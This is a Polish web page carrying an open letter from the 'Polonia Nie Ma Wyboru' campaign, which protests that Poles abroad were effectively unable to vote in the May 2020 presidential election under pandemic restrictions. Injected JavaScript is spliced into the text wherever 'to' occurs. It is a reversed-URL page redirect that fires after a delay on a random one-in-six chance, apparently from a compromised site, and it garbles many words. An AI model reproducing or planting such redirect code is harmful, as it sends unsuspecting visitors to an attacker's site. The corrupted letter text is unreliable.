< powrót do aktualności

Polonia Nie Ma Wyboru

List Polonii do Polonii i polskich organizacji polonijnych apelujący do władz RP o umożliwienie udziału w wyborach prezydenckich 2020.

Szanowni Państwo
Prezesi i Członkowie Organizacji Polonijnych
Drodzy Rodacy,
Zwracamy się do Państwa z apelem o przyłączenie się do globalnego protestu wywołanego sytuacją braku możliwości uczestnictwa Polonii w Wyborach Prezydenckich w dniu 10 maja 2020.
2. Aby wyrazić poparcie, prosimy o odpowiedź na niniejszą wiadomość. W odpowiedzi prosimy o podanie Państwa imienia, nazwiska, kraju zamieszkania. Jeśli należą Państwo do organizacji polonijnej, prosimy także o podanie jej nazwy i pełnionej funkcji.
3. Zachęcamy również do osobistego z kontaktu z poniższymi przedstawicielami władz RP. Załączamy wzory petycji oraz listę adresów mailowych do:
 Posłów i Senatobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torów RP pracujących w komisjach d/s współpracy z Polonią
 Ministra Spraw Zagranicznych Jacka Czaputobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}towicza
 Wiceministra Spraw Zagranicznych Szymona Szynkowskiego vel Sęka
Jako przedstawiciele Polonii nie zgadzamy się, aby uniemożliwiono lub poważne utrudniano nam udział w głosowaniu, które jest podstawowym prawem obywatelskim, gwarantobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}towanym przez Konstytucję RP.
Wszyscy jesteśmy obywatelami Polski i naszą ojczyzną jest Polska. Jesteśmy dumni z bycia Polakami. Staramy się być najlepszymi ambasadorami naszego kraju i budować jego pozytywny wizerunek za granicą. Wielu z nas działa w klubach i stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}towarzyszeniach polonijnych, które promują ojczystą histobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torię, naukę, kulturę, geografię i tradycje. Nawiązujemy też kontakty biznesowe które wspomagają Polskę ekonomicznie, poprzez rekomendacje międzynarodowej współpracy i inwestycji w naszym kraju.
Dlatego też prosimy o przyłączenie się Polonii całego świata do poniższego protestu:
My, Polacy mieszkający poza granicami Polski, protestujemy przeciwko odbieraniu nam konstytucyjnie zagwarantobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}towanego prawa głosu w Wyborach Prezydenckich 10 maja 2020 roku.
Globalna pandemia wirusa SARS-CoV-2, sprawiła, że wiele państw na całym świecie ogłosiło stany nadzwyczajne i zostały wprowadzone obostrzenia w zakresie zgromadzeń publicznych i poruszania się w obrębie danego kraju. W wielu krajach o szczególnie zaostrzonych restrykcjach (m.in. Wielka Brytania, Irlandia, Włochy, Hiszpania, Stany Zjednoczone) mieszka liczna Polonia. Stan nadzwyczajny uniemożliwia Polakom wzięcie udziału w wyborach bez łamania lokalnych przepisów i narażania się na kary finansowe.
Wielu Polaków, z uwagi na zawieszenie połączeń lądowych, lotniczych i wodnych pomiędzy krajami i w obszarach poszczególnych państw, nie ma fizycznej możliwości dotarcia do lokali wyborczych. Komisje wyborcze znajdują się w ambasadach i konsulatach, najczęściej w dużych aglomeracjach. Podróż do takich lokalizacji jest postrzegana przez wiele osób jako ryzyko zdrowotne.
Polacy przebywający poza granicami kraju nie mają możliwości wypełnienia swojego obywatelskiego obowiązku gwarantobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}towanego w Konstytucji RP. Liczba okręgów wyborczych na obczyźnie jest o wiele niższa, niż w poprzednich latach, mimo że nie zmniejszyła się w tym czasie liczebność Polonii. Niejednokrotnie oznacza tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to, że osoba pragnąca zagłosować musi pokonać setki kilometrów, żeby dostać się do lokalu wyborczego. Wiąże się tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to przede wszystkim z narażeniem zdrowia i życia, a także dodatkowymi kosztami i czasem. Ponadtobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to przekraczanie granic między regionami i miastami, jest obecnie w wielu krajach zabronione bądź poważnie utrudnione.
W związku z wprowadzonymi stanami nadzwyczajnymi, obywatele RP chcący głosować, byliby narażeni na łamanie lokalnego prawa i wysokie kary.
Nie zgadzamy się na nam odebranie, Polakom przebywającym na emigracji, praw gwarantobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}towanych nam w Konstytucji Rzeczypospolitej Polskiej. Dlatego protestujemy.
Organizatobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torzy protestu Polonia Nie Ma Wyboru
Polonia Nie Ma Wyboru
polonianiemawyboru@gmail.com

UWAGA! ADRESUJĄC LISTY DO MINISTRA SPRAW ZAGRANICZNYCH JACKA CZAPUTOWICZA LUB WICEMINISTRA SZYMONA SZYNKOWSKIEGO VEL SĘKA, NALEŻY WYSYŁAĆ JE NA PONIŻSZY ADRES:
sm.sekretariat@msz.gov.pl
Tytuł listu:
Apel do Ministra Spraw Zagranicznych w sprawie wyborów